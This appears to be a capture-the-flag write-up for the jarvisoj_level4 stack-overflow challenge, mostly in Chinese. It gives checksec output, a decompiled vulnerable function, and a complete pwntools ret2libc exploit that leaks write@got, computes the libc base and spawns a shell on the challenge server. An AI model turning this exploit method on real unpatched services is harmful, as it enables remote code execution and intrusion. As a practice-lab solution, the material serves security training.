jarvisoj_level4
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
32位，只开了 NX（栈不可执行，不能直接跳 shellcode）；没有 canary，覆盖返回地址不会被检测；No PIE，程序自身的 plt/got 地址固定。这三点合起来正好适合 ret2libc：先用 plt 里的函数泄露 got，再算 libc 基址。
// Decompiler (IDA) output for the vulnerable function in ./pwn.
// buf is 136 == 0x88 bytes and sits at ebp-0x88, so the saved ebp is at
// buf+0x88 and the return address at buf+0x8c. read() is allowed to write
// 0x100 == 256 bytes, i.e. up to 120 bytes past the end of buf, which is
// enough to rewrite both. With no stack canary (see checksec above) the
// overwrite goes unnoticed, and the function returns the byte count from
// read() straight to its caller.
ssize_t vulnerable_function()
{
char buf[136]; // [esp+0h] [ebp-88h] BYREF  -- 0x88 bytes below the saved ebp
return read(0, buf, 0x100u); // 0x100 > sizeof(buf): plain stack overflow of 120 bytes
}
栈溢出：buf 只有 0x88 字节，read 却最多读 0x100 字节，多出的 120 字节可以覆盖 saved ebp 和返回地址，返回地址相对 buf 的偏移是 0x88+4。
思路
跟 level3 差不多（思路：用 write@plt 把 write@got 打印出来，减去 libc 里 write 的偏移得到 libc 基址，再第二次溢出调 system("/bin/sh")），直接贴(传送门)。
注意一下 32 位和 64 位传参位置的区别即可：32 位下参数直接跟在栈上，布局是 [函数地址][调用后的返回地址][参数1][参数2]...，不需要 gadget；64 位下前几个参数走 rdi/rsi/rdx 寄存器，得先找 pop rdi; ret 之类的 gadget。
from pwn import*
from Yapack import *
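# --- Stage 0: targets -------------------------------------------------------
libc = ELF('libc-2.23_32.so')                         # libc matching the remote (32-bit glibc 2.23)
r, elf = rec("node4.buuoj.cn", 29255, "./pwn", 10)   # Yapack helper; yields (tube, ELF) -- presumably the ELF of ./pwn
context(os='linux', arch='i386', log_level='debug')  # must precede flat(): it selects 4-byte little-endian packing

# Distance from the start of buf to the saved return address: buf is at
# ebp-0x88 (see the decompilation), so 0x88 bytes reach the saved ebp and
# 4 more reach the return address.
OFFSET = 0x88 + 4

# Address the first chain returns to after write(), so the overflowing read
# runs a second time and we get a second payload in. 0x8048470 is fixed
# because the binary has No PIE.
# NOTE(review): looks like vulnerable_function (or main) -- if the binary
# has symbols, elf.sym['vulnerable_function'] is the self-documenting form.
RET_TO_VULN = 0x8048470

# --- Stage 1: leak write@got via write(1, &write@got, 4) --------------------
# i386 stack calling convention: [callee][return-after][arg1][arg2][arg3].
pl = cyclic(OFFSET) + flat(elf.plt['write'], RET_TO_VULN, 1, elf.got['write'], 4)
r.send(pl)

# write() emits exactly 4 bytes. recvn(4) blocks until all 4 have arrived;
# a plain recv(4) may return fewer bytes and u32() would then raise.
# Assumes nothing else is written to stdout before the leak -- TODO confirm
# against the binary; if it prints a banner, recvuntil() it first.
leaked_write = u32(r.recvn(4))
libc.address = leaked_write - libc.sym['write']
log.success(f"libc base: {libc.address:#x}")
# libc is mapped page-aligned. A misaligned base means the wrong libc file
# or the wrong bytes were consumed from the stream; stop before stage 2
# rather than send a garbage chain. (log.error raises, unlike assert.)
if libc.address & 0xfff:
    log.error(f"libc base {libc.address:#x} is not page-aligned -- wrong libc or desynced stream")

# --- Stage 2: ret2libc system("/bin/sh") ------------------------------------
# libc.address is set, so libc.sym / libc.search now return absolute addresses;
# computed here instead of via opaque helpers so the script documents itself.
system_addr = libc.sym['system']
binsh_addr = next(libc.search(b'/bin/sh\x00'))
# [system][fake return address for system][arg1 = "/bin/sh"]. 0 as the
# return address is fine for a one-shot shell: we never return from system().
pl = cyclic(OFFSET) + flat(system_addr, 0, binsh_addr)
r.sendline(pl)   # trailing '\n' still fits: 0x8c + 12 + 1 < 0x100
r.interactive()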